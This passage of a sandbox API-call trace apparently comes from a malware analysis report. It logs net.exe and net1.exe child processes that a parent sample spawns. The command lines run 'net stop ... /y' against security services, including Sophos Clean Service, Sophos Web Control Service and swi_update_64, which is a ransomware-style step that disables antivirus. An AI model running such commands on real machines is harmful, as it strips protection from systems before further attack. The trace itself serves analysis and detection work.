(hMem=0x8a9630) returned 0x0 [0199.165] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc41, dwLanguageId=0x0, lpBuffer=0x32f400, nSize=0x0, Arguments=0x32f3fc | out: lpBuffer="阰\x8a⡋瓢2阰\x8a2") returned 0x17 [0199.165] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0199.165] LocalFree (hMem=0x8a9630) returned 0x0 [0199.165] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc44, dwLanguageId=0x0, lpBuffer=0x32f400, nSize=0x0, Arguments=0x32f3fc | out: lpBuffer="阰\x8a⡋瓢2阰\x8a2") returned 0x18 [0199.165] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0199.165] LocalFree (hMem=0x8a9630) returned 0x0 [0199.165] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc47, dwLanguageId=0x0, lpBuffer=0x32f400, nSize=0x0, Arguments=0x32f3fc | out: lpBuffer="阰\x8a⡋瓢2阰\x8a2") returned 0x2a [0199.165] _wcsnicmp (_String1="NET stop", _String2="NET STAT", _MaxCount=0x8) returned 14 [0199.166] LocalFree (hMem=0x8a9630) returned 0x0 [0199.166] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc4a, dwLanguageId=0x0, lpBuffer=0x32f400, nSize=0x0, Arguments=0x32f3fc | out: lpBuffer="阰\x8a⡋瓢2阰\x8a2") returned 0x15 [0199.166] _wcsnicmp (_String1="NET stop", _String2="NET STOP", _MaxCount=0x8) returned 0 [0199.166] GetFileType (hFile=0x26c) returned 0x3 [0199.166] GetConsoleMode (in: hConsoleHandle=0x26c, lpMode=0x32f418 | out: lpMode=0x32f418) returned 0 [0199.166] GetConsoleOutputCP () returned 0x1b5 [0199.166] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="NET STOP\r\nservice\r\n\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0199.166] malloc (_Size=0x16) returned 0x182728 [0199.166] GetConsoleOutputCP () returned 0x1b5 [0199.166] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="NET STOP\r\nservice\r\n\r\n", cchWideChar=-1, lpMultiByteStr=0x182728, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NET STOP\r\nservice\r\n\r\n", lpUsedDefaultChar=0x0) returned 22 [0199.166] WriteFile (in: hFile=0x26c, lpBuffer=0x182728, nNumberOfBytesToWrite=0x15, lpNumberOfBytesWritten=0x32f41c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x32f41c, lpOverlapped=0x0) returned 0 [0199.166] free (_Block=0x182728) [0199.166] LocalFree (hMem=0x8a9630) returned 0x0 [0199.167] NetApiBufferFree (Buffer=0x8a1c98) returned 0x0 [0199.167] NetApiBufferFree (Buffer=0x8a1cb0) returned 0x0 [0199.167] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop ΓÇ£Sophos Clean ServiceΓÇ¥ /y" [0199.167] exit (_Code=1) Process: id = "154" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x53045000" os_pid = "0x360" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop swi_update_64 /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 327 os_tid = 0x38c Process: id = "155" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x539cc000" os_pid = "0x4ec" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "154" os_parent_pid = "0x360" cmd_line = "C:\\Windows\\system32\\net1 stop swi_update_64 /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 328 os_tid = 0x5f4 [0199.312] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x17fd10 | out: lpSystemTimeAsFileTime=0x17fd10*(dwLowDateTime=0x3ffdc920, dwHighDateTime=0x1d57a87)) [0199.312] GetCurrentProcessId () returned 0x4ec [0199.312] GetCurrentThreadId () returned 0x5f4 [0199.312] GetTickCount () returned 0x116b7ac [0199.312] QueryPerformanceCounter (in: lpPerformanceCount=0x17fd08 | out: lpPerformanceCount=0x17fd08*=31959666228) returned 1 [0199.312] GetModuleHandleA (lpModuleName=0x0) returned 0xb20000 [0199.312] __set_app_type (_Type=0x1) [0199.312] __p__fmode () returned 0x74eb31f4 [0199.312] __p__commode () returned 0x74eb31fc [0199.313] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xb2ffe6) returned 0x0 [0199.313] __getmainargs (in: _Argc=0xb39064, _Argv=0xb3906c, _Env=0xb39068, _DoWildCard=0, _StartInfo=0xb39024 | out: _Argc=0xb39064, _Argv=0xb3906c, _Env=0xb39068) returned 0 [0199.313] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0199.313] GetConsoleOutputCP () returned 0x1b5 [0199.313] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xb39080 | out: lpCPInfo=0xb39080) returned 1 [0199.313] SetThreadUILanguage (LangId=0x0) returned 0x409 [0199.316] sprintf_s (in: _DstBuf=0x17fcc8, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0199.316] setlocale (category=0, locale=".437") returned="English_United States.437" [0199.318] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0199.318] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0199.318] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop swi_update_64 /y" [0199.318] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x17fa94, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0199.318] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x6e) returned 0x623c10 [0199.318] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0199.318] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x17fc98 | out: Buffer=0x17fc98*=0x621c70) returned 0x0 [0199.318] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x17fc98 | out: Buffer=0x17fc98*=0x621c88) returned 0x0 [0199.318] _fileno (_File=0x74eb2900) returned -2 [0199.319] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0199.319] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0199.319] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0199.319] _wcsicmp (_String1="config", _String2="stop") returned -16 [0199.319] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0199.319] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0199.319] _wcsicmp (_String1="file", _String2="stop") returned -13 [0199.319] _wcsicmp (_String1="files", _String2="stop") returned -13 [0199.319] _wcsicmp (_String1="group", _String2="stop") returned -12 [0199.319] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0199.319] _wcsicmp (_String1="help", _String2="stop") returned -11 [0199.319] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0199.319] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0199.319] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0199.319] _wcsicmp (_String1="session", _String2="stop") returned -15 [0199.319] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0199.319] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0199.319] _wcsicmp (_String1="share", _String2="stop") returned -12 [0199.319] _wcsicmp (_String1="start", _String2="stop") returned -14 [0199.319] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0199.319] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0199.319] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0199.319] _wcsicmp (_String1="accounts", _String2="swi_update_64") returned -18 [0199.319] _wcsicmp (_String1="computer", _String2="swi_update_64") returned -16 [0199.319] _wcsicmp (_String1="config", _String2="swi_update_64") returned -16 [0199.319] _wcsicmp (_String1="continue", _String2="swi_update_64") returned -16 [0199.319] _wcsicmp (_String1="cont", _String2="swi_update_64") returned -16 [0199.319] _wcsicmp (_String1="file", _String2="swi_update_64") returned -13 [0199.319] _wcsicmp (_String1="files", _String2="swi_update_64") returned -13 [0199.319] _wcsicmp (_String1="group", _String2="swi_update_64") returned -12 [0199.319] _wcsicmp (_String1="groups", _String2="swi_update_64") returned -12 [0199.319] _wcsicmp (_String1="help", _String2="swi_update_64") returned -11 [0199.319] _wcsicmp (_String1="helpmsg", _String2="swi_update_64") returned -11 [0199.320] _wcsicmp (_String1="localgroup", _String2="swi_update_64") returned -7 [0199.320] _wcsicmp (_String1="pause", _String2="swi_update_64") returned -3 [0199.320] _wcsicmp (_String1="session", _String2="swi_update_64") returned -18 [0199.320] _wcsicmp (_String1="sessions", _String2="swi_update_64") returned -18 [0199.320] _wcsicmp (_String1="sess", _String2="swi_update_64") returned -18 [0199.320] _wcsicmp (_String1="share", _String2="swi_update_64") returned -15 [0199.320] _wcsicmp (_String1="start", _String2="swi_update_64") returned -3 [0199.320] _wcsicmp (_String1="stats", _String2="swi_update_64") returned -3 [0199.320] _wcsicmp (_String1="statistics", _String2="swi_update_64") returned -3 [0199.320] _wcsicmp (_String1="stop", _String2="swi_update_64") returned -3 [0199.320] _wcsicmp (_String1="time", _String2="swi_update_64") returned 1 [0199.320] _wcsicmp (_String1="user", _String2="swi_update_64") returned 2 [0199.320] _wcsicmp (_String1="users", _String2="swi_update_64") returned 2 [0199.320] _wcsicmp (_String1="msg", _String2="swi_update_64") returned -6 [0199.320] _wcsicmp (_String1="messenger", _String2="swi_update_64") returned -6 [0199.320] _wcsicmp (_String1="receiver", _String2="swi_update_64") returned -1 [0199.320] _wcsicmp (_String1="rcv", _String2="swi_update_64") returned -1 [0199.320] _wcsicmp (_String1="netpopup", _String2="swi_update_64") returned -5 [0199.320] _wcsicmp (_String1="redirector", _String2="swi_update_64") returned -1 [0199.320] _wcsicmp (_String1="redir", _String2="swi_update_64") returned -1 [0199.320] _wcsicmp (_String1="rdr", _String2="swi_update_64") returned -1 [0199.320] _wcsicmp (_String1="workstation", _String2="swi_update_64") returned 4 [0199.320] _wcsicmp (_String1="work", _String2="swi_update_64") returned 4 [0199.320] _wcsicmp (_String1="wksta", _String2="swi_update_64") returned 4 [0199.320] _wcsicmp (_String1="prdr", _String2="swi_update_64") returned -3 [0199.320] _wcsicmp (_String1="devrdr", _String2="swi_update_64") returned -15 [0199.320] _wcsicmp (_String1="lanmanworkstation", _String2="swi_update_64") returned -7 [0199.320] _wcsicmp (_String1="server", _String2="swi_update_64") returned -18 [0199.320] _wcsicmp (_String1="svr", _String2="swi_update_64") returned -1 [0199.320] _wcsicmp (_String1="srv", _String2="swi_update_64") returned -5 [0199.320] _wcsicmp (_String1="lanmanserver", _String2="swi_update_64") returned -7 [0199.320] _wcsicmp (_String1="alerter", _String2="swi_update_64") returned -18 [0199.320] _wcsicmp (_String1="netlogon", _String2="swi_update_64") returned -5 [0199.321] _wcsupr (in: _String="swi_update_64" | out: _String="SWI_UPDATE_64") returned="SWI_UPDATE_64" [0199.321] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x6254d0 [0199.323] GetServiceKeyNameW (in: hSCManager=0x6254d0, lpDisplayName="SWI_UPDATE_64", lpServiceName=0xb3aaf0, lpcchBuffer=0x17fc34 | out: lpServiceName="", lpcchBuffer=0x17fc34) returned 0 [0199.324] _wcsicmp (_String1="msg", _String2="SWI_UPDATE_64") returned -6 [0199.324] _wcsicmp (_String1="messenger", _String2="SWI_UPDATE_64") returned -6 [0199.324] _wcsicmp (_String1="receiver", _String2="SWI_UPDATE_64") returned -1 [0199.324] _wcsicmp (_String1="rcv", _String2="SWI_UPDATE_64") returned -1 [0199.324] _wcsicmp (_String1="redirector", _String2="SWI_UPDATE_64") returned -1 [0199.324] _wcsicmp (_String1="redir", _String2="SWI_UPDATE_64") returned -1 [0199.324] _wcsicmp (_String1="rdr", _String2="SWI_UPDATE_64") returned -1 [0199.324] _wcsicmp (_String1="workstation", _String2="SWI_UPDATE_64") returned 4 [0199.324] _wcsicmp (_String1="work", _String2="SWI_UPDATE_64") returned 4 [0199.324] _wcsicmp (_String1="wksta", _String2="SWI_UPDATE_64") returned 4 [0199.324] _wcsicmp (_String1="prdr", _String2="SWI_UPDATE_64") returned -3 [0199.324] _wcsicmp (_String1="devrdr", _String2="SWI_UPDATE_64") returned -15 [0199.324] _wcsicmp (_String1="lanmanworkstation", _String2="SWI_UPDATE_64") returned -7 [0199.324] _wcsicmp (_String1="server", _String2="SWI_UPDATE_64") returned -18 [0199.324] _wcsicmp (_String1="svr", _String2="SWI_UPDATE_64") returned -1 [0199.324] _wcsicmp (_String1="srv", _String2="SWI_UPDATE_64") returned -5 [0199.324] _wcsicmp (_String1="lanmanserver", _String2="SWI_UPDATE_64") returned -7 [0199.324] _wcsicmp (_String1="alerter", _String2="SWI_UPDATE_64") returned -18 [0199.324] _wcsicmp (_String1="netlogon", _String2="SWI_UPDATE_64") returned -5 [0199.324] NetServiceControl (in: servername=0x0, service="SWI_UPDATE_64", opcode=0x0, arg=0x0, bufptr=0x17fc30 | out: bufptr=0x17fc30) returned 0x889 [0199.325] wcscpy_s (in: _Destination=0xb3a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0199.325] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74a10000 [0199.326] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74a10000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xb3b338, nSize=0x800, Arguments=0xb39dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0199.327] GetFileType (hFile=0x26c) returned 0x3 [0199.327] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x624000 [0199.327] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x624000, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0199.327] WriteFile (in: hFile=0x26c, lpBuffer=0x624000, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x17fb70, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x17fb70, lpOverlapped=0x0) returned 0 [0199.327] LocalFree (hMem=0x624000) returned 0x0 [0199.327] GetFileType (hFile=0x26c) returned 0x3 [0199.327] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x6262a8 [0199.327] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x6262a8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nb", lpUsedDefaultChar=0x0) returned 2 [0199.327] WriteFile (in: hFile=0x26c, lpBuffer=0x6262a8, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x17fb70, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x17fb70, lpOverlapped=0x0) returned 0 [0199.327] LocalFree (hMem=0x6262a8) returned 0x0 [0199.327] _ultow (in: _Dest=0x889, _Radix=1571744 | out: _Dest=0x889) returned="2185" [0199.327] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74a10000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xb3b338, nSize=0x800, Arguments=0xb39dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0199.327] GetFileType (hFile=0x26c) returned 0x3 [0199.327] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x6262a8 [0199.327] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x6262a8, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0199.327] WriteFile (in: hFile=0x26c, lpBuffer=0x6262a8, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x17fb7c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x17fb7c, lpOverlapped=0x0) returned 0 [0199.327] LocalFree (hMem=0x6262a8) returned 0x0 [0199.328] GetFileType (hFile=0x26c) returned 0x3 [0199.328] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x6262a8 [0199.328] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x6262a8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nb", lpUsedDefaultChar=0x0) returned 2 [0199.328] WriteFile (in: hFile=0x26c, lpBuffer=0x6262a8, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x17fb7c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x17fb7c, lpOverlapped=0x0) returned 0 [0199.328] LocalFree (hMem=0x6262a8) returned 0x0 [0199.328] NetApiBufferFree (Buffer=0x621c70) returned 0x0 [0199.328] NetApiBufferFree (Buffer=0x621c88) returned 0x0 [0199.328] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop swi_update_64 /y" [0199.328] exit (_Code=2) Process: id = "156" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x6a34a000" os_pid = "0x4a0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop ΓÇ£Sophos Web Control ServiceΓÇ¥ /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 329 os_tid = 0x5f0 Process: id = "157" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x6049a000" os_pid = "0x4c8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "156" os_parent_pid = "0x4a0" cmd_line = "C:\\Windows\\system32\\net1 stop ΓÇ£Sophos Web Control ServiceΓÇ¥ /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 330 os_tid = 0x31c [0199.507] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x14ff64 | out: lpSystemTimeAsFileTime=0x14ff64*(dwLowDateTime=0x401a59a0, dwHighDateTime=0x1d57a87)) [0199.507] GetCurrentProcessId () returned 0x4c8 [0199.507] GetCurrentThreadId () returned 0x31c [0199.507] GetTickCount () returned 0x116b867 [0199.507] QueryPerformanceCounter (in: lpPerformanceCount=0x14ff5c | out: lpPerformanceCount=0x14ff5c*=31979195388) returned 1 [0199.508] GetModuleHandleA (lpModuleName=0x0) returned 0x690000 [0199.508] __set_app_type (_Type=0x1) [0199.508] __p__fmode () returned 0x74eb31f4 [0199.508] __p__commode () returned 0x74eb31fc [0199.508] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x69ffe6) returned 0x0 [0199.508] __getmainargs (in: _Argc=0x6a9064, _Argv=0x6a906c, _Env=0x6a9068, _DoWildCard=0, _StartInfo=0x6a9024 | out: _Argc=0x6a9064, _Argv=0x6a906c, _Env=0x6a9068) returned 0 [0199.508] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0199.508] GetConsoleOutputCP () returned 0x1b5 [0199.509] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x6a9080 | out: lpCPInfo=0x6a9080) returned 1 [0199.511] SetThreadUILanguage (LangId=0x0) returned 0x409 [0199.514] sprintf_s (in: _DstBuf=0x14ff1c, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0199.514] setlocale (category=0, locale=".437") returned="English_United States.437" [0199.516] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0199.516] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0199.516] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop ΓÇ£Sophos Web Control ServiceΓÇ¥ /y" [0199.516] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x14fce8, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0199.516] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xa0) returned 0x573c48 [0199.516] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0199.517] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x14feec | out: Buffer=0x14feec*=0x571ca8) returned 0x0 [0199.517] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x14feec | out: Buffer=0x14feec*=0x571cc0) returned 0x0 [0199.517] _fileno (_File=0x74eb2900) returned -2 [0199.517] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0199.517] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0199.517] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0199.517] _wcsicmp (_String1="config", _String2="stop") returned -16 [0199.517] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0199.517] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0199.517] _wcsicmp (_String1="file", _String2="stop") returned -13 [0199.517] _wcsicmp (_String1="files", _String2="stop") returned -13 [0199.517] _wcsicmp (_String1="group", _String2="stop") returned -12 [0199.517] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0199.517] _wcsicmp (_String1="help", _String2="stop") returned -11 [0199.517] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0199.517] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0199.517] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0199.517] _wcsicmp (_String1="session", _String2="stop") returned -15 [0199.517] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0199.517] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0199.517] _wcsicmp (_String1="share", _String2="stop") returned -12 [0199.517] _wcsicmp (_String1="start", _String2="stop") returned -14 [0199.517] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0199.517] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0199.517] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0199.517] _wcsicmp (_String1="accounts", _String2="ΓÇ£Sophos") returned -850 [0199.517] _wcsicmp (_String1="computer", _String2="ΓÇ£Sophos") returned -848 [0199.517] _wcsicmp (_String1="config", _String2="ΓÇ£Sophos") returned -848 [0199.517] _wcsicmp (_String1="continue", _String2="ΓÇ£Sophos") returned -848 [0199.518] _wcsicmp (_String1="cont", _String2="ΓÇ£Sophos") returned -848 [0199.518] _wcsicmp (_String1="file", _String2="ΓÇ£Sophos") returned -845 [0199.518] _wcsicmp (_String1="files", _String2="ΓÇ£Sophos") returned -845 [0199.518] _wcsicmp (_String1="group", _String2="ΓÇ£Sophos") returned -844 [0199.518] _wcsicmp (_String1="groups", _String2="ΓÇ£Sophos") returned -844 [0199.518] _wcsicmp (_String1="help", _String2="ΓÇ£Sophos") returned -843 [0199.518] _wcsicmp (_String1="helpmsg", _String2="ΓÇ£Sophos") returned -843 [0199.518] _wcsicmp (_String1="localgroup", _String2="ΓÇ£Sophos") returned -839 [0199.518] _wcsicmp (_String1="pause", _String2="ΓÇ£Sophos") returned -835 [0199.518] _wcsicmp (_String1="session", _String2="ΓÇ£Sophos") returned -832 [0199.518] _wcsicmp (_String1="sessions", _String2="ΓÇ£Sophos") returned -832 [0199.518] _wcsicmp (_String1="sess", _String2="ΓÇ£Sophos") returned -832 [0199.518] _wcsicmp (_String1="share", _String2="ΓÇ£Sophos") returned -832 [0199.518] _wcsicmp (_String1="start", _String2="ΓÇ£Sophos") returned -832 [0199.518] _wcsicmp (_String1="stats", _String2="ΓÇ£Sophos") returned -832 [0199.518] _wcsicmp (_String1="statistics", _String2="ΓÇ£Sophos") returned -832 [0199.518] _wcsicmp (_String1="stop", _String2="ΓÇ£Sophos") returned -832 [0199.518] _wcsicmp (_String1="time", _String2="ΓÇ£Sophos") returned -831 [0199.518] _wcsicmp (_String1="user", _String2="ΓÇ£Sophos") returned -830 [0199.518] _wcsicmp (_String1="users", _String2="ΓÇ£Sophos") returned -830 [0199.518] _wcsicmp (_String1="msg", _String2="ΓÇ£Sophos") returned -838 [0199.518] _wcsicmp (_String1="messenger", _String2="ΓÇ£Sophos") returned -838 [0199.518] _wcsicmp (_String1="receiver", _String2="ΓÇ£Sophos") returned -833 [0199.518] _wcsicmp (_String1="rcv", _String2="ΓÇ£Sophos") returned -833 [0199.518] _wcsicmp (_String1="netpopup", _String2="ΓÇ£Sophos") returned -837 [0199.518] _wcsicmp (_String1="redirector", _String2="ΓÇ£Sophos") returned -833 [0199.518] _wcsicmp (_String1="redir", _String2="ΓÇ£Sophos") returned -833 [0199.518] _wcsicmp (_String1="rdr", _String2="ΓÇ£Sophos") returned -833 [0199.518] _wcsicmp (_String1="workstation", _String2="ΓÇ£Sophos") returned -828 [0199.518] _wcsicmp (_String1="work", _String2="ΓÇ£Sophos") returned -828 [0199.518] _wcsicmp (_String1="wksta", _String2="ΓÇ£Sophos") returned -828 [0199.518] _wcsicmp (_String1="prdr", _String2="ΓÇ£Sophos") returned -835 [0199.518] _wcsicmp (_String1="devrdr", _String2="ΓÇ£Sophos") returned -847 [0199.518] _wcsicmp (_String1="lanmanworkstation", _String2="ΓÇ£Sophos") returned -839 [0199.518] _wcsicmp (_String1="server", _String2="ΓÇ£Sophos") returned -832 [0199.518] _wcsicmp (_String1="svr", _String2="ΓÇ£Sophos") returned -832 [0199.518] _wcsicmp (_String1="srv", _String2="ΓÇ£Sophos") returned -832 [0199.519] _wcsicmp (_String1="lanmanserver", _String2="ΓÇ£Sophos") returned -839 [0199.519] _wcsicmp (_String1="alerter", _String2="ΓÇ£Sophos") returned -850 [0199.519] _wcsicmp (_String1="netlogon", _String2="ΓÇ£Sophos") returned -837 [0199.519] _wcsicmp (_String1="accounts", _String2="Web") returned -22 [0199.519] _wcsicmp (_String1="computer", _String2="Web") returned -20 [0199.519] _wcsicmp (_String1="config", _String2="Web") returned -20 [0199.519] _wcsicmp (_String1="continue", _String2="Web") returned -20 [0199.519] _wcsicmp (_String1="cont", _String2="Web") returned -20 [0199.519] _wcsicmp (_String1="file", _String2="Web") returned -17 [0199.519] _wcsicmp (_String1="files", _String2="Web") returned -17 [0199.519] _wcsicmp (_String1="group", _String2="Web") returned -16 [0199.519] _wcsicmp (_String1="groups", _String2="Web") returned -16 [0199.519] _wcsicmp (_String1="help", _String2="Web") returned -15 [0199.519] _wcsicmp (_String1="helpmsg", _String2="Web") returned -15 [0199.519] _wcsicmp 